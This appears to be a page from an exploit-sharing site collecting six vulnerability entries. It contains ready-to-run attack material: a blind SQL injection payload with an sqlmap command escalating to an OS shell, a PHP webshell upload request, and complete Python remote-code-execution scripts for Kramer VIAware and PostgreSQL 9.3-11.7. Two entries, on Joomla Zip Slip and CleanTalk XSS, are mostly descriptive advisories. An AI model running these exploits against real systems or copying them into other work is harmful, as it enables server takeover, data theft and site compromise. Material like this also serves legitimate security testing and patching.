Latest exploits :: CodePwn

<pre><code># Title: Message System 1.0 1.0 Blind Time SQLi To Rce # Author: Hejap Zairy # Date: 30.07.2022 # Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html # Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache # Steps # 1.- Go to : https://0day.gov//pmms/?page=view_message&id=1 # 2 - manual inject Blind SQli Payload: https://0day.gov/pmms/?page=view_message&id=1' OR NOT 515=515#&password=hejap&button=Login # 3 - SQLi To RCE r00t # 4 - Ubload webshell # 5 - Web Shell to meterpreter full tty shell #vulnerability Code php --- ``` <?php $qry = $conn->query("SELECT * FROM `conversation_list` where id = '{$_GET['id']}' and (`user_1` = '{$_settings->userdata('id')}' or `user_2` = '{$_settings->userdata('id')}') "); if($qry->num_rows > 0){ foreach($qry->fetch_array() as $k => $v){ if(!is_numeric($k)) $$k = $v; } $msg = $conn->query("SELECT m.*,CONCAT(u.firstname,' ', COALESCE(u.middlename,''), ' ', u.lastname) as `name`, u.username, u.avatar FROM `message_list` m inner join users u on m.from_user = u.id where m.conversation_id = '{$id}' order by unix_timestamp(m.date_updated) asc limit 1 ")->fetch_array(); $conn->query("UPDATE `message_list` set `status` = 1 where conversation_id = '{$id}' and to_user = '{$_settings->userdata('id')}'"); } else{ echo "<script>alert('ID is unknown or you dont have access to view the Message.'); location.replace('./?page=inbox');</script>"; } ?> ``` --- #Status: CRITICAL [+] Payload GET --- GET /pmms/?page=view_message&id=1 HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=fcmu4ss9vhq6760poojbtk40bt Upgrade-Insecure-Requests: 1 --- ``` --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=view_message&id=1' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))sFek) AND 'MXDw'='MXDw --- ``` #Blind SQLi Time to Rce #ُExploit sqlmap -r hejap_0day --dbs --time-sec=10 --tamper=space2comment --threads=5 -p id -D pmms_db -T users --dump --eta --technique=t --hex --os-shell # Description: The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc # Proof and Exploit: https://i.imgur.com/HfDGPGT.png https://i.imgur.com/6RH1Wvi.png </code></pre>

<pre><code>------------------------------------------------- Joomla! <= 4.1.0 (Tar.php) Zip Slip Vulnerability ------------------------------------------------- [-] Software Link: http://www.joomla.org/ [-] Affected Versions: Version 4.1.0 and prior versions. Version 3.10.6 and prior versions. [-] Vulnerability Description: The vulnerability is located in the /libraries/vendor/joomla/archive/src/Tar.php script. Specifically, into the Joomla\Archive\Tar::extract() method: 113. $this->getTarInfo($this->data); 114. 115. for ($i = 0, $n = \count($this->metadata); $i < $n; $i++) 116. { 117. $type = strtolower($this->metadata[$i]['type']); 118. 119. if ($type == 'file' || $type == 'unix file') 120. { 121. $buffer = $this->metadata[$i]['data']; 122. $path = Path::clean($destination . '/' . $this->metadata[$i]['name']); 123. 124. // Make sure the destination folder exists 125. if (!Folder::create(\dirname($path))) 126. { 127. throw new \RuntimeException('Unable to create destination folder ' . \dirname($path)); 128. } 129. 130. if (!File::write($path, $buffer)) 131. { 132. throw new \RuntimeException('Unable to write entry to file ' . $path); 133. } 134. } 135. } The vulnerability exists because the above code is using the filename within the Tar archive ($path variable created at line 122) to write the extracted file by using File::write() at line 130, without properly verifying the destination path. This could be exploited to carry out Zip Slip (or Path Traversal) attacks and write/overwrite arbitrary files, potentially resulting in execution of arbitrary PHP code or other dangerous impacts. In the Joomla! core, successful exploitation of this vulnerability would require administrator privileges. However, there could be third-party components using the Joomla\Archive\Archive::extract() method. In such cases, this might potentially be exploited also by unauthenticated attackers, depending on the context. [-] Solution: Upgrade to version 3.10.7, 4.1.1, or later. [-] Disclosure Timeline: [19/02/2021] - Vendor notified [21/02/2021] - Vulnerability acknowledged by the vendor [21/02/2021] - Vendor sent details about a proposed patch [21/02/2021] - Sent feedback about the patch correctness [29/03/2022] - Vendor update released [29/03/2022] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2022-23793 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://developer.joomla.org/security-centre/870-20220301 [-] Original Advisory: http://karmainsecurity.com/KIS-2022-05 </code></pre>

<pre><code>Description: Reflected Cross-Site Scripting Affected Plugin: Spam protection, AntiSpam, FireWall by CleanTalk Plugin Slug: cleantalk-spam-protect Plugin Developer: CleanTalk Affected Versions: <= 5.173 CVE ID: CVE-2022-28221 CVSS Score: 6.1 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Researcher/s: Ramuel Gall Fully Patched Version: 5.174.1 CleanTalk is a WordPress plugin designed to protect websites from spam comments and registrations. One of the features it includes is the ability to check comments for spam and present the spammy comments for deletion. The plugin uses the column_ct_comment function in /lib/Cleantalk/ApbctWP/FindSpam/ListTable/Comments.php to display the list of spam comments, and in doing so generates links to approve, trash, or mark comments as spam using the value supplied in $_REQUEST[‘page’]. Thanks to a quirk of how WordPress processes the page parameter and the default PHP request order, it is possible to use this parameter to perform a reflected cross-site scripting attack, which is almost identical to a vulnerability we recently covered (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VWyH9-9bcDccVffKwW5h910xVGwS3m4HgybWN2_Qd573kWFJV1-WJV7CgNgvN4sk7l6S5pYhW3RwYHq6GsK6QW1pJKcl8MWFK3W74DmyG8pyJrYW97sldm92C9V8W7wHKz25sqYtkW3QYgc52jFss-W5XxnmS5gbpMsW8gngml2WrRZ2W5jMKx748WfY9W1yWfPC28Gsd4W6L9b-g3pPQMtW6JjfWK8syNZbVj0Tfp9c9H45N2vP0sncLYbLW24s2rZ5y93x3W6Th-0s5SM_BMW8VBJRF8V7x8rW1Q-S3z1P9xLFW92hLnf1McrkFW8V_VDm7FM-3wW77pxyw7Tqk7GW8rcxNX6Y6pjlMyZK3MHZ8FrW7wzdJ7927wH8W1ntpm38D4Xm432XB1 ) . The vulnerability can be used to execute JavaScript in the browser of a logged-in administrator, for instance, by tricking them into visiting a self-submitting form that sends a POST request to the site at wp-admin/edit-comments.php?page=ct_check_spam, with the $_POST[‘page’] parameter set to malicious JavaScript. As with any Cross-Site Scripting vulnerability, executing JavaScript in an administrator’s session can be used to take over a site by adding a new malicious administrator or injecting a backdoor, among other potential methods. Description: Reflected Cross-Site Scripting Affected Plugin: Spam protection, AntiSpam, FireWall by CleanTalk Plugin Slug: cleantalk-spam-protect Plugin Developer: CleanTalk Affected Versions: <= 5.173 CVE ID: CVE-2022-28222 CVSS Score: 6.1 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Researcher/s: Ramuel Gall Fully Patched Version: 5.174.1 Similar to the spam comment functionality, CleanTalk also includes a feature that checks for spammy users and presents them in a similar table for review and deletion. In this case the vulnerable function is column_ct_username in /lib/Cleantalk/ApbctWP/FindSpam/ListTable/Users.php, which uses the value of $_REQUEST[‘page’] to generate links to delete potentially spammy users. As with the spam comment vulnerability, if an administrator can be tricked into performing an action, it is possible to use JavaScript running in their browser to take over a site. Timeline February 15, 2022 – The Wordfence Threat Intelligence team finishes our investigation and verifies that the Wordfence firewall’s built-in protection is sufficient to block exploit attempts. We send the full disclosure to a contact at CleanTalk that we have successfully disclosed vulnerabilities to in the past. March 22, 2022 – As we have not yet heard back from our contact, we reported the vulnerability to the WordPress plugins team. March 25, 2022 - A patched version of the plugin, 5.174.1, becomes available. Conclusion In today’s article, we covered two nearly identical reflected Cross-Site Scripting vulnerabilities in the Spam protection, AntiSpam, FireWall by CleanTalk plugin for WordPress. While both of these vulnerabilities require some degree of social engineering, both could be used for site takeover. </code></pre>

<pre><code># Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE) # Date: 28/03/2022 # Exploit Author: sharkmoos & BallO # Vendor Homepage: https://www.kramerav.com/ # Software Link: https://www.kramerav.com/us/product/viaware # Version: 2.5.0719.1034 # Tested on: ViaWare Go (Windows 10) # CVE : CVE-2019-17124 import requests, sys, urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def adminLogin(s, host, username, password): headers = { "Host": f"{host}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-GB,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": f"https://{host}", "Referer": f"https://{host}/admin/login.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Sec-Gpc": "1", "Te": "trailers", "Connection": "close" } data = { "txtUserId": username, "txtPwd": password, "btnOk" :"Login" } response = s.post(f"https://{host}/admin/login.php", verify=False) if len(s.cookies) < 1: return False else: return True def writeCommand(session, host, command): headers = { "Host": f"{host}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "text/html, */*", "Accept-Language": "en-GB,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Origin": f"https://{host}", "Referer": f"https://{host}/browseSystemFiles.php?path=C:\Windows&icon=browser", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Sec-Gpc": "1", "Te": "trailers", "Connection": "close" } data = { "radioBtnVal":f"{command}", "associateFileName": "C:/tc/httpd/cgi-bin/exploit.cmd" } session.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data) def getResult(session, host): file = session.get(f"https://{host}/cgi-bin/exploit.cmd", verify=False) pageText = file.text if len(pageText) < 1: result = "Command did not return a result" else: result = pageText return result def main(host, username="su", password="supass"): s = requests.Session() # comment this line to skip the login stage loggedIn = adminLogin(s, host, username, password) if not loggedIn: print("Could not successfully login as the admin") sys.exit(1) else: pass command = "" while command != "exit": command = input("cmd:> ").strip() writeCommand(s, host, command) print(getResult(s, host)) exit() if __name__ == "__main__": args = sys.argv numArgs = len(args) if numArgs < 2: print(f"Run script in format:\n\n\tpython3 {args[0]} target\n") print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass") if numArgs == 2: main(args[1]) if numArgs == 4: main(args[1], args[2], args[3]) if numArgs > 4: print(f"Run script in format:\n\n\tpython3 {args[0]} target\n") print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass") </code></pre>

<pre><code># Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-03-29 # Exploit Author: b4keSn4ke # Github: https://github.com/b4keSn4ke # Vendor Homepage: https://www.postgresql.org/ # Software Link: https://www.postgresql.org/download/linux/debian/ # Version: 9.3 - 11.7 # Tested on: Linux x86-64 - Debian 4.19 # CVE: CVE-2019–9193 #!/usr/bin/python3 import psycopg2 import argparse import hashlib import time def parseArgs(): parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution') parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]') parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]') parser.add_argument('-d', '--database', nargs='?', default='template1', help='Name of the PostgreSQL DB [Default: template1]') parser.add_argument('-c', '--command', nargs='?', help='System command to run') parser.add_argument('-t', '--timeout', nargs='?', type=int, default=10, help='Connection timeout in seconds [Default: 10 (seconds)]') parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]') parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]') args = parser.parse_args() return args def main(): try: print ("\r\n[+] Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port)) connection = psycopg2.connect ( database=args.database, user=args.user, password=args.password, host=args.ip, port=args.port, connect_timeout=args.timeout ) print ("[+] Connection to Database established") print ("[+] Checking PostgreSQL version") checkVersion(connection) if(args.command): exploit(connection) else: print ("[+] Add the argument -c [COMMAND] to execute a system command") except psycopg2.OperationalError as e: print ("\r\n[-] Connection to Database failed: \r\n{0}".format(e)) exit() def checkVersion(connection): cursor = connection.cursor() cursor.execute("SELECT version()") record = cursor.fetchall() cursor.close() result = deserialize(record) version = float(result[(result.find("PostgreSQL")+11):(result.find("PostgreSQL")+11)+4]) if (version >= 9.3 and version <= 11.7): print("[+] PostgreSQL {0} is likely vulnerable".format(version)) else: print("[-] PostgreSQL {0} is not vulnerable".format(version)) exit() def deserialize(record): result = "" for rec in record: result += rec[0]+"\r\n" return result def randomizeTableName(): return ("_" + hashlib.md5(time.ctime().encode('utf-8')).hexdigest()) def exploit(connection): cursor = connection.cursor() tableName = randomizeTableName() try: print ("[+] Creating table {0}".format(tableName)) cursor.execute("DROP TABLE IF EXISTS {1};\ CREATE TABLE {1}(cmd_output text);\ COPY {1} FROM PROGRAM '{0}';\ SELECT * FROM {1};".format(args.command,tableName)) print ("[+] Command executed\r\n") record = cursor.fetchall() result = deserialize(record) print(result) print ("[+] Deleting table {0}\r\n".format(tableName)) cursor.execute("DROP TABLE {0};".format(tableName)) cursor.close() except psycopg2.errors.ExternalRoutineException as e: print ("[-] Command failed : {0}".format(e.pgerror)) print ("[+] Deleting table {0}\r\n".format(tableName)) cursor = connection.cursor() cursor.execute("DROP TABLE {0};".format(tableName)) cursor.close() finally: exit() if __name__ == "__main__": args = parseArgs() main() </code></pre>

<pre><code># Title: Medical Hub Directory Site 1.0 Shell Upload # Author: Hejap Zairy # Date: 30.07.2022 # Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html # Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw #vulnerability Code php Needs more filtering to upload profile files php``` $img_err= ""; if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != ''){ $fname = 'uploads/system-logo.png'; $dir_path =base_app. $fname; $upload = $_FILES['img']['tmp_name']; $type = mime_content_type($upload); $allowed = array('image/png','image/jpeg'); if(!in_array($type,$allowed)){ $img_err.=" But Logo Image failed to upload due to invalid file type."; }else{ // $new_height = 200; // $new_width = 200; list($width, $height) = getimagesize($upload); $t_image = imagecreatetruecolor($width, $height); $black = imagecolorallocate($t_image, 0, 0, 0); imagecolortransparent($t_image, $black); imagealphablending( $t_image, false ); imagesavealpha( $t_image, true ); $gdImg = ($type == 'image/png')? imagecreatefrompng($upload) : imagecreatefromjpeg($upload); imagecopyresampled($t_image, $gdImg, 0, 0, 0, 0, $width, $height, $width, $height); if($gdImg){ if(is_file($dir_path)) unlink($dir_path); $uploaded_img = imagepng($t_image,$dir_path); if($uploaded_img){ if(isset($_SESSION['system_info']['logo'])){ $qry = $this->conn->query("UPDATE system_info set meta_value = CONCAT('{$fname}','?v=',unix_timestamp(CURRENT_TIMESTAMP)) where meta_field = 'logo' "); }else{ $qry = $this->conn->query("INSERT into system_info set meta_value = CONCAT('{$fname}','?v=',unix_timestamp(CURRENT_TIMESTAMP)),meta_field = 'logo' "); } } imagedestroy($gdImg); imagedestroy($t_image); }else{ $img_err.=" But Logo Image failed to upload due to unkown reason."; } } } ``` [+] Payload POST ``` POST /mhds/admin/?page=manage_account HTTP/1.1 Host: 0day.gov Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738 Content-Length: 882 Origin: https://0day.gov Referer: https://0day.gov/mhds/ Upgrade-Insecure-Requests: 1 Te: trailers Connection: close -----------------------------409902128312379197203124536738 Content-Disposition: form-data; name="productName" Hejap Zairy -----------------------------409902128312379197203124536738 Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php" Content-Type: image/png <?=`$_GET[515]`?> -----------------------------409902128312379197203124536738 Content-Disposition: form-data; name="submit" -----------------------------409902128312379197203124536738-- ``` #Status: CRITICAL [+] Payload GET ``` GET /mhds/uploads/users/0day_hejap.png.php?515=echo+Hejap+Zairy HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41 Upgrade-Insecure-Requests: 1 ``` #Response ``` HTTP/1.1 200 OK Date: Thu, 30 Mar 2022 11:15:56 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-Powered-By: PHP/7.4.27 Content-Length: 12 Connection: close Content-Type: text/html; charset=UTF-8 Hejap Zairy ``` # Description: The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers. # Proof and Exploit: https://i.imgur.com/N9rKLB4.png https://i.imgur.com/CrpqRox.png https://i.imgur.com/Un1sM4Q.png </code></pre>